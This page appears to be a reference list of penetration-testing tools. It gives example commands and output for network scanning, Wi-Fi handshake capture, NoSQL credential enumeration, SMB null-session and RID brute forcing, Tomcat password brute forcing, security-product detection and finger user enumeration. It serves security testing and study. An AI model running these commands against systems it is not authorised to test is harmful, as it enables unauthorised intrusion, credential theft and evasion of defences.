Scan and Discovery
nmapAutomator: A script you can run in the background! Useful for running during your enum exercise. I used it during my OSCP certification!
RustScan: The Modern Port Scanner. Find ports quickly (3 seconds at its fastest). Run scripts through our scripting engine (Python, Lua, Shell supported).
dscan: Distributed Nmap, wrapper around Nmap to allow distributed network enumeration.
1
%dscan --name project name srv --config dscan.conf targets.txt
2
3
Distributed Scan Status
4
========================
5
6
--------- ---------------- ------------
7
N Stages N Pending Tasks Completion %
8
--------- ---------------- ------------
9
4 0 0.00%
10
11
--------- ---------- ----------- ------------
12
Stage N Targets N Finished Completion %
13
--------- ---------- ----------- ------------
14
discovery 1 0 0.00%
15
16
--------------- --------- ----------- ------------
17
Agent Stage Task Status Target Ip
18
--------------- --------- ----------- ------------
19
127.0.0.1:53281 discovery DOWNLOADING 127.0.0.1/32
Copied!
hcxdumptool: Small tool to capture packets from wlan devices.
1
sudo hcxdumptool -i wlp39s0f3u4u5 -o output.pcapng -t 5 --enable_status=3
2
3
start capturing (stop with ctrl+c)
4
INTERFACE:...............: wlan0
5
FILTERLIST...............: 0 entries
6
MAC CLIENT...............: f0a225a8faa8
7
MAC ACCESS POINT.........: 00bb3a4250d5 (incremented on every new client)
8
EAPOL TIMEOUT............: 150000
9
REPLAYCOUNT..............: 61585
10
ANONCE...................: 765e00f3f9788ebf2df96c69ee9806b19df6105b2c39b389d76d4d85ee5f0f66
11
12
[10:37:11 - 001] 00156d9a26c0 -> f0a225a8faa8 Anan Apartment [PROBERESPONSE, SEQUENCE 2696, AP CHANNEL 1]
13
[10:37:12 - 001] 6c8dc120891f -> ffffffffffff Anan Apartment [PROBEREQUEST, SEQUENCE 2643]
14
[10:37:12 - 001] 00bb3a4250d6 -> 6c8dc120891f Anan Apartment [PROBERESPONSE, SEQUENCE 0, AP CHANNEL 1]
15
[10:37:12 - 001] 70778110c833 -> 00156d9a26c0 [PROBEREQUEST, SEQUENCE 256]
16
[10:37:32 - 009] 403decc272b8 -> 2c5bb8742b39 Paangoon_2G [PROBERESPONSE, SEQUENCE 1940, AP CHANNEL 9]
17
[10:37:36 - 011] ec1f72b8f3d1 -> f0a225a8faa8 Muay [PROBERESPONSE, SEQUENCE 2902, AP CHANNEL 11]
18
[10:37:38 - 011] 083e8eaa328b -> ffffffffffff Muay [PROBEREQUEST, SEQUENCE 9]
19
[10:37:38 - 011] 00bb3a4250d7 -> 083e8eaa328b Muay [PROBERESPONSE, SEQUENCE 9, AP CHANNEL 11]
20
[10:37:39 - 011] 083e8eaa328b -> ec1f72b8f3d1 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 14306]
21
[10:37:39 - 011] ec1f72b8f3d1 -> 083e8eaa328b [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 7419]
22
[10:37:50 - 002] 4c189a2fb76e -> ffffffffffff Topline_Wifi [PROBEREQUEST, SEQUENCE 344]
23
[10:37:50 - 002] 00bb3a4250d8 -> 4c189a2fb76e Topline_Wifi [PROBERESPONSE, SEQUENCE 10, AP CHANNEL 2]
24
[10:38:01 - 008] b6b98a73aa05 -> f0a225a8faa8 Panmongkon [PROBERESPONSE, SEQUENCE 1433, AP CHANNEL 8]
25
[10:38:01 - 008] b6b98a73e88a -> f0a225a8faa8 Panmongkon [PROBERESPONSE, SEQUENCE 3790, AP CHANNEL 8]
26
[10:38:20 - 001] 74da38b04d5a -> ffffffffffff seasun [PROBEREQUEST, SEQUENCE 3235]
27
[10:38:20 - 001] 00bb3a4250d9 -> 74da38b04d5a seasun [PROBERESPONSE, SEQUENCE 25, AP CHANNEL 1]
28
INFO: cha=9, rx=13802, rx(dropped)=1073, tx=319, powned=2, err=0
Copied!
hcxdumptool
Penetration Testing Tools
Nosql-MongoDB-injection-username-password-enumeration: Using this script, we can enumerate Usernames and passwords of Nosql(mongodb) injecion vulnerable web applications.
1
python nosqli-user-pass-enum.py -u http://example.com/index.php -up username -pp password -ep username -op login:login,submit:submit
Copied!
nullinux: Nullinux is an internal penetration testing tool for Linux that can be used to enumerate OS information, domain information, shares, directories, and users through SMB. If no username and password are provided in the command line arguments, an anonymous login, or null session, is attempted. Nullinux acts as a wrapper around the Samba tools smbclient & rpcclient to enumerate hosts using a variety of techniques.
ridenum: A simple open source method for performing null session brute forces.
1
./ridenum.py 192.168.1.50 500 50000 /root/dict.txt /root/user.txt
Copied!
tomcat-weak-password-scanner: Tomcat password brute-force.
SharpEDRChecker: Checks running processes, process metadata, Dlls loaded into your current process and the each DLLs metadata, common install directories, installed services and each service binaries metadata, installed drivers and each drivers metadata, all for the presence of known defensive products such as AV's, EDR's and logging tools.
finger-user-enum: finger-user-enum (Solaris OS) is a tool for enumerating OS-level user accounts via the finger service. As of release v1.0 it is known to work against the default Solaris daemon. It may not yet work against all daemons since there is no defined format for the data returned by the finger service.
1
$ ./finger-user-enum.pl -U users.txt -t 10.0.0.1
2
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )
3
4
----------------------------------------------------------
5
| Scan Information |
6
----------------------------------------------------------
7
8
Worker Processes ......... 5
9
Usernames file ........... users.txt
10
Target count ............. 1
11
Username count ........... 47
12
Target TCP port .......... 79
13
Query timeout ............ 5 secs
14
Relay Server ............. Not used
15
16
######## Scan started at Sun Jan 21 19:44:22 2007 #########
17
[email protected]: root Super-User console 2:03 Wed 07:23 ..
18
[email protected]: bin ??? pts/1 <Dec 21 13:04> 10.0.0.99
19
[email protected]: daemon ??? < . . . . >..
20
[email protected]: adm Admin < . . . . >..
21
[email protected]: lp Line Printer Admin < . . . . >..
22
[email protected]: uucp Admin < . . . . >..
23
[email protected]: nobody4 SunOS 4.x Nobody < . . . . >..
24
[email protected]: ftp Anonymous FTPUser 674 <Aug 11 14:22> 10.0.0.99
25
######## Scan completed at Sun Jan 21 19:44:23 2007 #########
26
8 results.
27
28
47 queries in 1 seconds (47.0 queries / sec)
Copied!

Copy link
Contents